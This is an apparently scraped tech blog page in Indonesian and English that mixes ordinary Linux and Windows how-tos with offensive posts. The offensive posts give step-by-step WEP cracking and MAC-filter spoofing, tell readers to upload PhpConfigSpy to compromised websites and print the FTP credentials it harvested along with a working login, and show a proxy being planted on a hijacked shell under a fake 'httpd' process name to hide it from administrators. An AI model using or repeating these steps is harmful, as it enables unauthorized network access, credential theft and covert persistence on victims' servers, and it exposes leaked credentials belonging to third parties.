Linux Wireless Hacking

informasi dan Pengetahuan Tentang Wireless Hacking di Linux ini diperuntukan sebagai pembelajaran semata. Bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan sendiri dengan aparat penegak hukum.

Ada tiga (3) objektif / tujuan teknik yang akan di terangkan disini, yaitu,
- Teknik membobol WEP
- Teknik membobol MAC filter.
- Teknik melihat Hidden SSID

Asumsi
- Chipset Wireless yang digunakan adalah Intel, seperti, ipw2200. Kalau anda cukup beruntung
menggunakan chipset Atheros anda dapat melakukan hal-hal yang lebih dahsyat.

Aplikasi yang perlu disiapkan.
Beberapa paket software yang dibutuhkan

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Scanning Hotspot
Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.

iwlist
Cara yang paling sederhana adalah menggunakan perintah

# iwlist scanning

Kismet
cara yang lebih rumit menggunakan kismet

# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
source=none,none,addme --> source=ipw2200,eth1,ipwsource

Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet

# kismet

airodump
Mematikan mode monitor di WLAN interface eth1

# airmon-ng stop eth1

Mengaktifkan mode monitor di WLAN interface eth1
# airmon-ng start eth1

Scanning melalui WLAN interface eth1

# airodump-ng eth1

Menjebol WEP menggunakan airodump dan aircrack
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini
membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan
susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu,

(1) BSSID / MAC Addresss AP
(2) MAC address WLAN kita
(3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1

Jalankan airodump di WLAN eth1

# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.

Melewati Pembatasan Mac Address
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di
ijinkan lewat oleh AP menggunakan Kismet adalah

# kismet

Lakukan space

S - untuk men-sort
S - untuk men-sort terhadap SSID
Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja & MAC address client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1
# airmon-ng stop eth1
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang
diijinkan AP

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain

# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1

Menemukan Hidden SSID
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <>.

Ditulis oleh: Onno W. Purbo, X-code Magazine

Read more...

Download video on youtube with Linux

Actually with Linux you can easy download video on youtube.
I have 2 way for download video on youtube with Ubuntu.


Frist (without tool)

After you watching video on youtube with your browser (mozila or opera) until done,
you can find out video with this method.
Go to home directory and enter crl+H then you will be see hidden file and directory

If use Mozilla go to directory .mozila/firefox/0y3ysrwn.default/Cache and find out video

If use Opera go to directory .opera/cache4 and find out video

Second (with slimrat)

Slimrat is perl tool, before use slimrat you must be make sure this perl module has been installed.

$ sudo apt-get install libwww-mechanize-perl libgtk2-gladexml-perl

Then download slimrat tools on http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

$ wget http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

extract slimrat-0.9.4.tar.bz2

$ tar -lxvf slimrat-0.9.4.tar.bz2

go to directory slimrat-0.9.4

$ cd slimrat-0.9.4

now you can easy download video on youtube with command

$ ./slimrat http://www.youtube.com/watch?v=blablabla


enjoy!!

Read more...

Stopping Proccess from DOS prompt

Oftentimes we are using task manager to stop/kill proccess on Windows operating system.
Besides that way, you can using DOS prompt to stop/kill proccess on windows. This is the how to do that.

1. Enter DOS prompt, you can go to start menu -> run and then type ‘cmd’
2. Type “tasklist” without quote and press enter, and it will appear the list of processes running as bellow

3. Choose the application that you want to stop/kill and then find the PID number of that application
4. Type “tskill ” to kill the proccess

Read more...

Multiple Login Yahoo! Messenger

Yahoo Messenger (YM) is one of the most used to chat. Beside YM, people maybe used MSN, ICQ, Skype etc. Here i will give some tutorial how to login more than one account YM in 1 computer on windows (just for Yahoo! Messenger).
Let’s Begin

1. Run registry editor. Start Menu -> Run, then type regedit and press enter.
2. Find this folder in the left of registry menu HKEY_CURRENT_USERSoftwareYahooPagerTest
3. In the right panel, right click mouse and choose New - Dword Value
4. Type Plural
5. Double click that Plural and filled it with 1

It’s finished all :D. You can sign in with 2 Yahoo account in 1 computer.

Read more...

PhpConfigSpy v0.2 - Scan and Grab Login

PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported ssh) and maybe database login.
Most of us, after getting a web target (Via inject PHP) we will use that web only for BOT (EGGDROP, PSYBNC). Why we do not try to get full access to the Web target.
Let’s we try to get some information login from web target with PhpConfigSpy tool.

Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of scaning :
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Binggo… That is success !!!
You can check that username via FTP or SSH (if target supported SSH)
Let we check together for this login
[FTP] bsidenet:bside123 Success
That’s mean user : bsidenet and password : bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It’s Work

Read more...

Install proxy

You have ssh shell or target shell inject ? and you don’t know for what that shell ??
I will try to assist you how to make proxy using that ssh. First, get the source of proxy.tgz
If you using shell inject, you must find directory that have permission 777 (drwxrrwxrwx) with this command “find / - tipe d -perm 777″.
Look the step by step to build proxy bellow :

[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
–01:30:35– http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com… 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz’

100%[=======================================>] 54,004 –.-K/s in 0.04s

01:30:35 (1.21 MB/s) - `proxy.tgz’ saved [54004/54004]

[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox

[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr–r– 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132

Proxy already done and ready to use. Use the IP of ssh shell and 2020 for port.
That proxy is running using fakename ./httpd to blind the real administrator.
If you want to kill that proxy you can kill by PidNum (20132) using this command “kill -9 20132″.

Read more...

Ubuntu Hardy Heron - Installing OpenOffice 3.0.1

Singkat kata kenapa saya harus menginstal openoffice 3 di Ubuntu Hardy Heron yaitu karena openoffice 2 tidak dapat membaca file dari Microsoft office 2007 seperti docx dan beberapa bug yang ada di openoffice 2 telah di perbaiki di dalam openoffice 3.

langsung saja,

Uninstall terlebih dahulu openoffice 2

$ sudo apt-get --purge autoremove openoffice.org-core

Delete folder .openoffice yang berada di decertory home

$ sudo rm -rf /home/user/.openoffice.org

Download file openoffice 3

$ wget http://kambing.ui.edu/openoffice/stable/3.0.1/OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Setelah selesai, lalu extract

$ tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Masuk ke dalam directory hasil extract tadi

$ cd OOO300_m15_native_packed-1_en-US.9379/DEBS

install

$ sudo dpkg -i *.deb
$ cd desktop-integration/
$ sudo dpkg -i *.deb

Selesai !!!
Sekarang Openoffice 3.0.1 sudah terinstal di Ubuntu Hardy Heron.

Read more...

Gyach di ubuntu jaunty dengan repository linuxmint

Install gyach di ubuntu jaunty lebih mudah pakai repository Linuxmint.
Masuk System/Administration/sofware-sources pada tab Thrid-Party Sofware
klik add kemudian pada APT line masukan
deb http://packages.linuxmint.com felicia main upstream import community

Go to terminal!!

$ sudo apt-get update
$ sudo apt-cache search gyach
gyachi - A Linux client for the Yahoo! Messenger protocol written using GTK+ GUI toolkit

$ sudo apt-get install gyachi

Read more...

Ubuntu di Laptop PANASONIC CF-W4

Kali ini coba install Ubuntu 9.04 atau yang di kenal dengan nama jaunty di laptop PANASONIC CF-W4,

Proses instalasi berjalan dengan normal dan tidak ada masalah.
Semua driver sudah terdeteksi, namun ketika mengunakan hotkey untuk mengatur volume(fn+f6/f5), contras(fn+f1/f2), mute(fn+f4), dsb ternyata tidak jalan.

Setelah browsing - browsing dan baca baca ahkirnya ketemulah jalan terangnya :D


Pertama perlu menginstal git core

$ sudo aptitude install git-core

kemudian checkout module

$ git clone git://git.myrix.net/pana_acpi

complie dan install

$ cd pana_acpi
$ make
$ make install

kemudian jalankan perintah cp untuk mengcopy file

$ sudo cp pana_acpi/acpi/* /etc/acpi

restart acpid daemon

$ sudo /etc/init.d/acpid restart

jalankan

modprobe panasonic-laptop

hotkey sekarang sudah jalan :)

Supaya modprobe di load saat booting silahkan tambahkan "modprobe panasonic-laptop" pada file /etc/rc.local

Read more...